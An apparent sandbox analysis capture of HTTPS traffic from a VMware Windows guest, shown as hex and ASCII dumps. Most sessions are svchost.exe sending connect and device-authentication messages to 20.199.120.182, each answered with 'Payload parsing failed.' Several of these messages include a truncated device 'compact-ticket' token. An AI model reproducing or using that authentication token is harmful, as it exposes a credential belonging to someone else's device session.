                                                          2022-09-11 08:16:26 UTC606INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 7a 00 00 00 00 00 41 03 01 07 01 03 01 0f 01 03 01 07 01 03 01 1f 01 03 01 07 01 03 01 0f 01 03 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: azAZ
                                                          2022-09-11 08:16:26 UTC608INData Raw: 5f 8b ab 10 ee 01 00 00 fe 01 00 00 2e 2e 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 25 96 8a 19 00 00 00 00 00 00 00 00 00 00 00 80 f0 70 00 01 01 00 00 f0 01 0e 00 ff 00 00 00 50 03 07 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 14 10 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3b ab 10 c0 7b ab 10 ef 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 00 00 00 00 ff 00 00 00 e1 1e 00 00 3b 3b 00 00 5a 5a 00 00 78 78 00 00 97 97 00 00 b5 b5 00 00 d4 d4 00
                                                          Data Ascii: _.. %pPTPT;{;;ZZxx
                                                          2022-09-11 08:16:26 UTC609INData Raw: 04 00 00 00 00 01 01 09 0d 04 00 d8 d8 00 00 e8 28 c0 00 a8 8d 25 00 00 00 00 00 00 00 00 00 90 76 e6 00 14 14 00 00 00 00 00 00 00 00 00 00 a4 42 e6 00 56 56 00 00 e4 e0 04 00 00 00 00 00 28 28 00 00 30 30 00 00 60 60 00 00 01 01 20 20 00 00 00 00 80 a5 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 00 00 0d 0d 00 00 1c 1c 00 00 1c 1c 00 00 12 12 00 00 07 07 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 03 00 00 0a 0a 00 00 12 12 00 00 14 14 00 00 10 10 00 00 08
                                                          Data Ascii: (%vBVV((00`` %
                                                          2022-09-11 08:16:26 UTC610INData Raw: e3 00 e3 00 e3 00 e0 00 eb 0b d5 00 ed 38 e5 00 e5 00 e6 00 e6 00 e6 00 e6 00 e7 00 e7 00 e8 00 e8 00 db 00 f7 2c e9 00 e9 00 ea 00 ea 00 ea 00 ea 00 c3 00 b9 7a dc 00 00 f2 d1 00 00 88 88 00 00 3c 3c 00 00 0a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 00 00 90 29 00 00 29 29 00 00 29 29 00 00 29 29 00 00 29 1f 00 00 1f 00 00 00 00 0c 09 04 01 36 21 12 05 3c 25 1c 05 43 5f 1a 06 49 56 18 07 50 72 25 07 57 72 2d 08 5d 7a 2f 08 64 4e 23 09 57 72 2d 08 47 59 18 06 2d 3e 17 04 10 17 06 01 43 00 00 43 be 00 c4 7a da 00 da 00 db 00 db 00 da 00 d1 0b ba 00 2b 91 a6 00 00 a6 ce 00 8d 43 de 00 de 00 df 00 df 00 df 00 df 00 c4 00 ab 6f a6 00 00 a6 d0 00 93 43 e2 00 e2 00 e3 00 e3 00 e0 00 eb 0b bb 00 24 9b f5 00 00 ba b4
                                                          Data Ascii: 8,z<<o))))))))6!<%C_IVPr%Wr-]z/dN#Wr-GY->CCz+CoC$
                                                          2022-09-11 08:16:26 UTC612INData Raw: 14 14 00 00 14 1e 00 00 1e 94 00 00 94 b4 00 f7 43 b6 00 b6 00 b7 00 b7 00 b7 00 b7 00 b8 00 b8 00 b7 00 9b 2c cf 00 00 ff cf 00 00 4e 4e 00 00 0f 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 72 00 00 8d 69 00 00 69 a9 00 00 a9 72 00 00 72 69 00 00 69 18 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 0c 06 02 25 34 17 06 3d 26 13 08 5f 76 23 0a 83 b4 3b 0c 8a b0 37 0d 8e b2 31 0d a7 2a f3 7e 89 00 a8 21 83 00 83 00 85 00 85 00 87 00 87 00 a6 00 c9 6f 75 00 00 75 10 00 00 10 10 00 00 10 10 00 00 10 1a 00 00 1a 10 00 00 10 10 00 00 10 1a 00 00 1a 93 00 00 93 ae 00 ed 43 a8 00 a8 00 a9 00 a9 00 ad 00 ad 00 b0 00 e9 59 dd 00 00 96 b4 00 00 3b 3b 00 00 07 07 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: C,NNriirrii%4=&_v#;71*~!ouuCY;;
                                                          2022-09-11 08:16:26 UTC613INData Raw: f7 00 00 2f 39 00 00 0b 0b 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 8b 75 44 3a 0b 75 44 3a 0b 75 44 3a 0b 5d 77 24 0e 12 00 00 12 0a 00 00 0a 0c 00 00 0c 0e 00 00 0e 10 00 00 10 12 00 00 12 14 00 00 14 16 00 00 16 18 00 00 18 1a 00 00 1a 1c 00 00 1c 1e 00 00 1e 21 00 00 21 23 00 00 23 25 00 00 25 27 00 00 27 29 00 00 29 2b 00 00 2b 3e 00 00 3e 81 00 00 81 8e 00 0b 85 56 00 15 43 28 00 23 0b 20 00 20 00 20 00 20 00 22 00 22 00 3f 00 1e 21 64 00 2a 4e a2 00 3e 96 b5 00 00 da 9a 00 00 19 19 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 00 00 8b 70 5f 25 0a 70 5f 25 0a 70 5f 25
                                                          Data Ascii: /9tuD:uD:uD:]w$!!##%%''))++>>VC(# ""?!d*N>tp_%p_%p_%
                                                          2022-09-11 08:16:26 UTC617INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 43 00 00 ea 22 00 00 70 9c 00 00 9c a4 22 f2 74 95 c7 7e 2c 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8a b0 37 0d 84 bc 34 0c 7d 48 3e 0b 77 45 39 0b 70 5f 25 0a 69 45 26 0a 63 49 23 09 5c 7b 2f 08 56 72 2c 08 50 72 25 07 48 57 18 07 42 5e 1a 06 3c 25 1c 05 35 23 13 05 2f 3b 10 04 28 39 15 04 21 2f 0d 03 8d 04 0f 86 a0 31 19 88 67 4b 25 09 60 49 20 09 59 7f 2e 08 52 71 2b 08 4b 6b 27 07 45 58 1b 06 3d 27 1c 06 37 20 12 05 30 24 10 04 a4 05 3e 99 e9 00 00 89 99 00 00 4c 4c 00 00 13 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 00 65 6e 00 00 bd b7 00 00 fa e6 22 f2 74 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d 8e b2 31 0d
                                                          Data Ascii: C"p"t~,11174}H>wE9p_%iE&cI#\{/Vr,Pr%HWB^<%5#/;(9!/1gK%`I Y.Rq+Kk'EX='7 0$>LLFen"t11111
                                                          2022-09-11 08:16:26 UTC621INData Raw: b2 b2 a3 a3 9d 9d 89 89 fb fb f4 f4 ee ee d8 d8 d3 d3 cb cb c5 c5 3f 20 20 00 34 35 01 00 01 31 37 37 3e 3e 24 24 2c 2c 13 13 18 18 00 00 09 09 75 75 7a 7a 7f 7f 65 65 69 69 6f 6f 54 54 5a 5a 42 42 4e 4e a4 a4 af af 94 94 9f 9f 84 84 8f 8f f4 f4 e1 e1 ef ef d5 d5 c5 c5 22 23 29 29 05 05 61 61 53 53 80 80 86 86 f9 f9 c0 c0 cb cb 37 34 0b 0b 70 70 7c 7c b6 b6 bf bf ab ab 83 83 f7 f7 d4 d4 de de 25 24 54 54 5c 5c 9a 9a 80 80 e8 e8 c7 c7 06 01 51 51 43 43 fd fd fb fb c5 c5 3b 3a 04 04 0a 0a 7b 7b b2 b2 ba ba e9 e9 d2 d2 da da 34 37 3a 3a 8e 8f fc fc e4 e4 ee ee e9 e9 d1 d1 67 68 6e 6e 51 51 4b 4b b4 b4 a0 a0 9c 9c 93 93 da da 0c 0d 7f 7f 4e 4e b7 b7 a7 a7 9a 9a fb fb fe fe 68 6b 62 62 50 50 bb bb bd bd b7 b7 a7 a7 9d 9d 8a 8a 83 83 f1 f1 ee ee da da d3 d3 ca
                                                          Data Ascii: ? 45177>>$$,,uuzzeeiiooTTZZBBNN"#))aaSS74pp||%$TT\\QQCC;:{{47::ghnnQQKKNNhkbbPP
                                                          2022-09-11 08:16:26 UTC622INData Raw: 9b 72 73 c0 c0 2d 2e a0 a0 51 50 2d 22 77 77 50 50 57 57 4f 4f 44 44 b8 b8 bc bc 95 95 eb eb c9 c9 c0 c0 c4 c4 38 39 3d 3d 31 31 35 35 29 29 2d 2d 67 67 5d 5d 51 51 55 55 49 49 ef ef d8 d8 c5 c5 3a 39 32 32 36 36 2a 2a 0b 0b 61 61 b7 b7 ae ae a2 a2 a6 a6 9a 9a 9e 9e 92 92 96 96 8a 8a c0 c0 3a 3b 3f 3f 33 33 37 37 fa fd f0 f0 dc dc 79 78 6c 6c f4 f4 de de d1 d1 3d 70 70 00 20 20 00 00 2a 1a 77 77 41 41 9a 9a 89 89 a6 a7 99 99 2e 2d e0 e0 0f 08 7b 7b b5 b7 37 80 80 00 14 14 00 00 00 31 35 35 39 39 3d 3d 1d 1d 01 01 31 90 90 00 44 44 00 00 5c 6e 52 52 96 96 9a 9a fa fa da da 3a 3b 27 27 03 03 7f 7f 63 63 43 43 a3 a3 9f 9f 83 83 ff ff e3 e3 c3 c3 3f 38 24 24 04 04 64 64 44 44 a4 a4 84 84 e4 e4 c4 c4 38 39 25 25 35 00 00 a0 a0 00 e4 e4 00 00 08 38 fc fc e4 e4
                                                          Data Ascii: rs-.QP-"wwPPWWOODD89==1155))--gg]]QQUUII:92266**aa:;??3377yxll=pp *wwAA.-{{715599==1DD\nRR:;''ccCC?8$$ddDD89%%58


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          10192.168.2.34976220.199.120.182443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:18:14 UTC637OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 5c5439a98aa8ef67
                                                          2022-09-11 08:18:14 UTC637OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:18:14 UTC637OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 5c5439a98aa8ef67<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:18:14 UTC638OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 63 35 34 33 39 61 39 38 61 61 38 65 66 36 37 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 5c5439a98aa8ef67
                                                          2022-09-11 08:18:14 UTC638INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:18:14 UTC638INData Raw: 4d 53 2d 43 56 3a 20 6e 62 4f 4f 71 2f 7a 43 63 45 61 76 2f 39 65 72 41 4d 59 4c 4d 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: nbOOq/zCcEav/9erAMYLMw.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          11192.168.2.34976320.199.120.182443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:18:46 UTC638OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 36 39 30 61 37 62 64 31 32 64 36 32 37 62 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 42690a7bd12d627b
                                                          2022-09-11 08:18:46 UTC638OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:18:46 UTC638OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 36 39 30 61 37 62 64 31 32 64 36 32 37 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 42690a7bd12d627b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:18:46 UTC639OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 36 39 30 61 37 62 64 31 32 64 36 32 37 62 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 42690a7bd12d627b
                                                          2022-09-11 08:18:46 UTC639INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:18:46 UTC639INData Raw: 4d 53 2d 43 56 3a 20 70 54 61 48 57 4c 4a 48 4a 30 71 4e 31 41 45 78 4f 30 57 65 51 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: pTaHWLJHJ0qN1AExO0WeQg.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          12192.168.2.34977220.199.120.182443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:19:38 UTC639OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 33 32 37 30 36 35 61 33 35 37 39 36 34 66 62 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 9327065a357964fb
                                                          2022-09-11 08:19:38 UTC639OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:19:38 UTC640OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 33 32 37 30 36 35 61 33 35 37 39 36 34 66 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 9327065a357964fb<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:19:38 UTC641OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 33 32 37 30 36 35 61 33 35 37 39 36 34 66 62 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 9327065a357964fb
                                                          2022-09-11 08:19:38 UTC641INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:19:38 UTC641INData Raw: 4d 53 2d 43 56 3a 20 57 52 36 52 38 65 42 64 50 45 32 61 58 69 71 2b 55 33 6e 48 4a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: WR6R8eBdPE2aXiq+U3nHJg.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          13192.168.2.34977320.199.120.182443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:20:40 UTC641OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 31 30 39 33 30 35 37 37 66 64 63 34 66 39 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 246Context: 7d10930577fdc4f9
                                                          2022-09-11 08:20:40 UTC641OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:20:40 UTC641OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 31 30 39 33 30 35 37 37 66 64 63 34 66 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 7d10930577fdc4f9<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:20:40 UTC642OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 31 30 39 33 30 35 37 37 66 64 63 34 66 39 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 7d10930577fdc4f9
                                                          2022-09-11 08:20:40 UTC642INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:20:40 UTC642INData Raw: 4d 53 2d 43 56 3a 20 58 33 34 47 4f 5a 6c 75 53 45 2b 2b 57 49 63 76 75 56 38 70 30 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: X34GOZluSE++WIcvuV8p0A.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.34973520.199.120.182443C:\Windows\System32\svchost.exe
                                                          TimestampkBytes transferredDirectionData
